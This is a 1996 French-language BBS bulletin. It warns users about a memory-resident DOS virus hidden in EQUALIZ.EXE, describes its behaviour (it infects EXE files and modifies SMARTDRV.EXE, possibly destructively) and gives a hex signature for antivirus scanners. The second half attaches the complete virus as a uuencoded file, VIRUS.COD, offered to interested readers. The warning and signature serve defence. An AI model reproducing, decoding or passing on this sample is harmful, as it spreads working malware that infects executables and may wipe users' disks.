=============================================================================== Date: 09-15-96 Time: 09:36p Number: 754 From: SNEM Refer: 0 To: ALL Board ID: RAVEZONE Reply: Subject: Attention users EQZ!!! 28: RAV_GENERALE Status: Public ------------------------------------------------------------------------------- DSk Bulletin Officiel Report nø2! --------------------------------- þ Virus identifi‚ par SNEM le 14/09/1996 þ Informations sur le virus: - taille : 936 octets - fichiers cibles: EXE et 'C:\DOS\SMARTDRV.EXE' - non polymorphe (ouff!!) - se place en memoire residente (via int 08h) - se greffe a la fin du fichier infecte þ Origine du virus: - nom du fichier zip:SITEZWAR.ZIP - nom du fichier infecte:EQUALIZ.EXE - taille du fichier infecte: 7554 octets (enlever 936 octets pour avoir la taille reelle du fichier non infecte,ainsi vous saurez sans passer par un antivirus si votre fichier est infecte) EQUALIZ.EXE est un fichier pub (bbs-addy) donc il est possible que tous les fichiers provenant de ce bbs soient infectes en leur fichier equaliz.exe (ou autre nom de fichier ayant pour taille 7,5ko)!!! þ Objectif du virus: infecte tous les fichiers exe et en particulier modifie le code du fichier 'c:\dos\smartdrv.exe' (d'o— l'interˆt d'installer le dos dans un repertoire nomm‚ autrement que 'dos') þ Le fichier smartdrv.exe apres modification s'il est lance (heureusement pour ma part) va alors faire une action precise ,je pense, de nature tres destructrice, plusieurs hypotheses sont emises: 1ø) formater le disk dur! 2ø) detruire la partition du disk dur 3ø) faire je ne sais quoi þ Comment le detecter??? Il faut utiliser un antivirus permettant d'entrer de nouvelles chaines de virus sous forme hexadecimale, puis ensuite effacer les fichiers infectes ,c'est le seul moyen que je connaisse pour l'instant,voici le code de la chaine hexadecimale: 60 1E 06 E8 02 00 EB 0B Je pense qu'avec ce morceau vous le decelerez facilement! þ SySops: ajoutez cette chaine a vos anti-virus car apparemment ce virus est passe a travers les uploads sur bbs! Voila,virus oui mais controle aussi! ++úú<>úú++ Pour ceux qui s'interesserait de pres a ce virus,voici le virus isole VIRUS.COD uuencode: begin 644 VIRUS.cod M8!X&Z`(`ZPN+W#:++X/M!HO$PPY8+BN&T0`NB8;1`!98+3\`+HF&RP"X`V/- M(3W__W1_D)",V$B.V(L>`P"#ZSZT2_[,S2%R:;L]`+1'_L3-(7)>#A^+]8[` MOP``N<$#\Z0FQ@:C`P!(CMC'!@$`"`#'!@@`1$_'!@H`4P`&'[@(-F`&X""6ZTP#-(;@A-60.X(26Z,`+-(;A``([8_PX3`#/` MCMBA!@".P(L>!``F@#_/=`+__P"CW@&^ZP'HE0"`^0!T*H`^ MW0$!#X5^`,8&W0$`@.DQ@/D#=W&0D+@Q`@+!`N&C&@*^!@+HB`#K7;[Y`>A@ M`(#Y`'0N@#[=`0%U2\8&W0$`:D`',]LF@S\`=`V+P]'HB]`%,0"T`7K)+X%`N@G`(#Y`'04@#[=`0%U$L8&W0$`OAX"Z#``ZP7&!MT!`1\' M8?OJ/`!<"/V+'MX!N@"XCL(STH/K`B:*#ZPTICP`=`8ZP73O,LG#_`:X0`". MP*V+R-'@!1X`)J,<`";'!AH`'@"_'@#SI0?#`20/`J;/Q\O2SL/$R=75IL7. MP\7-Q,G>ULG4TM6FP<_0P\')PLO)PL,+```D8RYT%'04>2P@.6,N;QAM,@`` M#1P(```?-@B_+\K`K` M=`\\6G<)/$%R!00@B$3_Z^PN@#ZC`P%T#`X?NH\#Q@:C`P'K$(%\_7AE#X7> M`.CC``^$UP"X`CW-(0^"S@`.'XO8N`!7S2&)#J0#B1:F`X#A'X#Y!0^$KP"! M)J0#X/^##J0#!;0_N1@`NJ@#S2&X`D(SR3/2S2&#^@0/AXH`4E"+#KP#B0[/ M`(L.O@.)#M$`BPZP`\'A!"O!@)P>('"\)`HZP#M#_^Q+FH`S/2 MS2%R([@`0C/),]+-(;0__L2Y&`"ZJ`/-(;@`5T"+#J0#BQ:F`\TAM#[-(1]A M^^J>$!P!B]J`/UQU`HO+0X!__P!U\D&+V8L'/&YU`<.,RX[#_+^%`[D%`/*O DPW-C=&)C;&8M9G!C.EQD;W-<